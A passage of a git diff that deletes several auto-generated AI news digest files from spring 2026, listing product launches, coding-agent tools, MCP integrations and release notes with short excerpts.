Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI - ---- - -## [NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.](https://x.com/earlyn_ai/status/2049176023724359681) -*X / @earlyn_ai* | 28/04/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers. - ---- - -## [shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.](https://x.com/DevLsx/status/2049019913465979131) -*X / @devlsx* | 28/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below. - ---- - -## [I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code](https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/) -*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.86 -Tags: api_update, developer_tool - -> I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos. So I built ginnie-agents and ran my own team on it for months. Open-sourcing it now. 
What it is: a framework for a team of autonomous AI agents in your Slack workspace. Each agent has: \- Its own Slack identity, app, avatar, channel \- Persistent thre - ---- - -## [Qwen Code v0.15.4 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4) -*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.78 -Tags: api_update, cli_tool - -> ## What's Changed * feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643 * fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609 * fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640 * fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q - ---- - -## [Open source package with 1 million monthly downloads stole user credentials](https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/) -*Ars Technica AI* | Score: 0.74 -Tags: open_source, developer_tool - ---- - -## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/) -*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. 
The CLI and MCP server ex - ---- - -## [ComfyUI Raises $30M at $500M Valuation](https://x.com/robertnishihara/status/2047772168147374085) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities. - ---- - -## [Scoble on One AI Doing Everything: The Everything App Is Coming](https://x.com/Scobleizer/status/2048690528653660399) -*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 -Tags: tool_update - -> Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. The vision is more radical than most industry commentary about AI integration. - ---- - diff --git a/data/digest-2026-04-29.md b/data/digest-2026-04-29.md deleted file mode 100644 index 8b3a4f9..0000000 --- a/data/digest-2026-04-29.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-29** | 15 stories | Auto-generated from 700 archived stories - ---- - -## [Vercel CLI @vercel/python-workers@0.0.19 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19) -*GitHub Releases · Vercel CLI* | 29/04/2026 | Score: 0.62 -Tags: api_update, developer_tool, cli_tool - -> ### Patch Changes - b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends. - fddd88c: [vercel-workers] payload type validation - fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior. 
- ---- - -## [Converting Claude Code into the most intelligent Deep Research Agent](https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there. HyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro. It uses a 16-step pipeline that creates a searchable, persistent knowled - ---- - -## [Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw](https://x.com/Maginative/status/2049200033665569020) -*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 -Tags: mcp, tool_update - -> Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session. - ---- - -## [AAIF Announces AGNTCon and MCPCon EU and NA for 2026](https://x.com/AgenticAIFdn/status/2039696612633571565) -*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 -Tags: mcp, product_launch - -> The Agentic AI Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders. - ---- - -## [Poolside AI Just Released Its First Public Models: Open Source and API](https://x.com/marah_i_abdin/status/2049161468017287490) -*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model. 
- ---- - -## [Qwen Code v0.15.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5) -*GitHub Releases · Qwen Code* | 29/04/2026 | Score: 0.94 -Tags: mcp, cli_tool - -> ## What's Changed * mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279 * fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667 * feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687 * feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577 * feat(cli): wire backgrou - ---- - -## [The final nail in the coffin for entry level creative freelancers just dropped](https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.94 -Tags: api_update, mcp - -> Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type "create a low poly beach scene with palm trees and sunset lighting" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron This is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects - ---- - -## [Launched My First App Using Claude](https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.86 -Tags: api_update, tool_update - -> Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude. It’s a vehicle management app. 
Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API). It’s all front end, and everything is stored locally on the users device. The API calls do require a da - ---- - -## [Claude Design is amazing but I keep hitting rate limits. Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.](https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.78 -Tags: api_update, open_source - -> Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations. Found an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit. Wanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e - ---- - -## [Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling](https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 -Tags: mcp, tool_update - -> So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all. 
**What Claude did autonomously:** * Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm) * Mapped every port and - ---- - -## [Pattern I'm using to keep Claude Code productive on overnight unattended runs](https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 -Tags: api_update, developer_tool - -> Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code. Built a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v - ---- - -## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/) -*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. 
The CLI and MCP server expose it to - ---- - -## [LosslessCut v3.68.0 released](https://github.com/mifi/lossless-cut/releases/tag/v3.68.0) -*GitHub Releases · LosslessCut* | 29/01/2026 | Score: 0.70 -Tags: github_release, tool_update - -> ⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311) Note: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut - ---- - -## [I built a Kanban board for Claude Code so I can run agent sessions straight from cards](https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/) -*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.54 -Tags: open_source, cli_tool - -> I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done. So I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). Each card is a task. Click run → it spins up a Claude session scoped to that task. When Claude finishes, the card moves itself to Done. It turned Claude from "a terminal I talk to" into - ---- - -## [Are we underweighting execution benchmarks when we talk about open-source frontier models?](https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/) -*Reddit r/StableDiffusion* | 29/04/2026 | Score: 1.00 -Tags: open_source - -> A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier. 
Ling-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling. If more frontier open models - ---- - diff --git a/data/digest-2026-04-30.md b/data/digest-2026-04-30.md deleted file mode 100644 index 581a568..0000000 --- a/data/digest-2026-04-30.md +++ /dev/null @@ -1,117 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-30** | 15 stories | Auto-generated from 692 archived stories - ---- - -## [[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read](https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/) -*Reddit r/ClaudeAI* | 30/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc). We built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv - ---- - -## [The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now.](https://x.com/AI_BioPhD/status/2049769860897321027) -*X / @ai_biophd* | 30/04/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now. 
- ---- - -## [Cursor SDK — The Democratization of Agent Development](https://x.com/Marktechpost/status/2049711306643759265) -*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment. - ---- - -## [Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:](https://x.com/Codex_Changelog/status/2049905403262079480) -*X / @codex_changelog* | 30/04/2026 | Score: 0.97 -Tags: cli_tool, tool_update - -> Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog: - ---- - -## [Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell](https://pu.dev/) -*Hacker News* | 30/04/2026 | Score: 0.88 -Tags: cli_tool, agent_tool - ---- - -## [26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.](https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/) -*Reddit r/ClaudeAI* | 30/04/2026 | Score: 0.86 -Tags: mcp, open_source - -> Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it. LightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). 
About 47K lines of Go, 114 MCP too - ---- - -## [pnpm v11.0.3 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.3) -*GitHub Releases · pnpm* | 30/04/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - -> ## Patch Changes * Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412). * Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na - ---- - -## [Vercel CLI @vercel/python-workers@0.0.20 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20) -*GitHub Releases · Vercel CLI* | 30/04/2026 | Score: 0.76 -Tags: developer_tool, cli_tool - -> ### Patch Changes - 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers - ---- - -## [Gemini CLI v0.40.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1) -*GitHub Releases · Gemini CLI* | 30/04/2026 | Score: 0.70 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/26268 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1 - ---- - -## [X announces a rebuilt ad platform powered by AI](https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [Stripe introduces Link, a digital wallet that autonomous AI agents can use, too](https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - 
-## [The MCP Era Feels Like Déjà Vu 1 day ago • 3](https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu) -*Hugging Face Blog* | Score: 1.00 -Tags: mcp - ---- - -## [Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…](https://x.com/ClaudeDigest/status/2049902211292127462) -*X / @claudedigest* | 30/04/2026 | Score: 1.00 -Tags: mcp - -> Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code … - ---- - -## [81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.](https://x.com/polsia/status/2049901864381288455) -*X / @polsia* | 30/04/2026 | Score: 1.00 -Tags: agent_tool - -> 81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process. - ---- - -## [MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights](https://x.com/itsPaulAi/status/2049862276832715177) -*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 -Tags: open_source - -> Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. The gap is closing fast. 
- ---- - diff --git a/data/digest-2026-05-01.md b/data/digest-2026-05-01.md deleted file mode 100644 index ac9324c..0000000 --- a/data/digest-2026-05-01.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-01** | 15 stories | Auto-generated from 600 archived stories - ---- - -## [Built + open sourced anti-slopsquatting CLI](https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 -Tags: open_source, developer_tool, cli_tool - -> TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators. Repo: https://github.com/zhendahu/dep-doctor There's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s - ---- - -## [Vercel CLI @vercel/python-workers@0.0.21 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21) -*GitHub Releases · Vercel CLI* | 01/05/2026 | Score: 0.62 -Tags: api_update, developer_tool, cli_tool - -> ### Patch Changes - 6935baa: Refactor Python queue sdk into `_queue/` - 574c9f1: [vercel-workers] Replaces retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6) - ---- - -## [Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…](https://x.com/firstadopter/status/2050264818972516799) -*X / @firstadopter* | 01/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Bonkers. Also, told y’all! 
OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..” - ---- - -## [One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…](https://x.com/OpenAI/status/2050250926888468929) -*X / @openai* | 01/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing. - ---- - -## [Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.](https://x.com/yunara97/status/2050108352550592636) -*X / @yunara97* | 01/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers. - ---- - -## [Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast](https://x.com/NousResearch/status/2049878944007041210) -*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. The open-source agent ecosystem is maturing quickly. 
- ---- - -## [Whohas – Command-line utility for cross-distro, cross-repository package search](https://github.com/whohas/whohas) -*Hacker News* | 01/05/2026 | Score: 0.99 -Tags: developer_tool, cli_tool - ---- - -## [Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.](https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 -Tags: product_launch, tool_update - -> https://vexjoy.com/posts/cloud-skills-are-still-just-skills/ The skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect. If Anthropic ships more features this way, the ecosystem splits into ope - ---- - -## [Found Zero day Claude Desktop + Chromium bug need to know where to submit report.](https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. Please let me know where I can submit this report. - ---- - -## [Example of using the GodotIQ MCP with Coding Agent to create video games](https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 -Tags: mcp, agent_tool - -> I’ve developed an MCP server for Godot. 
Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor. To test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca - ---- - -## [Mobile App with Clade](https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 -Tags: developer_tool, tool_update - -> Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses "Add to Homescreen" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. 
And h - ---- - -## [Turbo v2.9.7 released](https://github.com/vercel/turborepo/releases/tag/v2.9.7) -*GitHub Releases · Turbo* | 01/05/2026 | Score: 0.70 -Tags: github_release, tool_update - -> ## What's Changed ### eslint * chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604 ### Examples * feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595 * chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600 * examples - ---- - -## [Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits](https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/) -*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.62 -Tags: api_update, developer_tool - -> I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off. So I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s - ---- - -## [You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…](https://x.com/_stephenbishop_/status/2050263244020015404) -*X / @_stephenbishop_* | 01/05/2026 | Score: 1.00 -Tags: mcp - -> You can now connect your Meta ads to Claude via MCP. 
Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta - ---- - -## [VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale](https://x.com/veedstudio) -*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 -Tags: product_launch - -> VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications. - ---- - diff --git a/data/digest-2026-05-02.md b/data/digest-2026-05-02.md deleted file mode 100644 index c8c52d3..0000000 --- a/data/digest-2026-05-02.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-02** | 15 stories | Auto-generated from 459 archived stories - ---- - -## [@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts](https://x.com/WesRoth/status/2050606311440531809) -*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 -Tags: mcp, product_launch, cli_tool, tool_update - -> Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language. - ---- - -## [I built a Claude Code skill that gives Claude real local time + session tracking (open source, one-line install)](https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/) -*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says "the current time" it's hallucinating. 
Got tired of correcting it, so I built time-anchor. **What it does:** \- Auto-detects your timezone on install, no API key, no network call \- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \- Logs every session start/end so Claude can answer "how long have we been talking" or "what did I say 20 minutes ago" \- Persists in a local JSON file (or shares with another memory plugin via $TIME\_ANCHOR\_MEMORY\_PATH) \- \~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \- covering \~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. #### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel… - ---- - -## [Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)](https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/) -*Reddit r/StableDiffusion* | 02/05/2026 | Score: 1.00 -Tags: api_update, open_source, cli_tool - -> Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent. Parallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly. Apache 2.0, local-first, zero network calls. github.com/Thatayotlhe04/Par - ---- - -## [Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. 
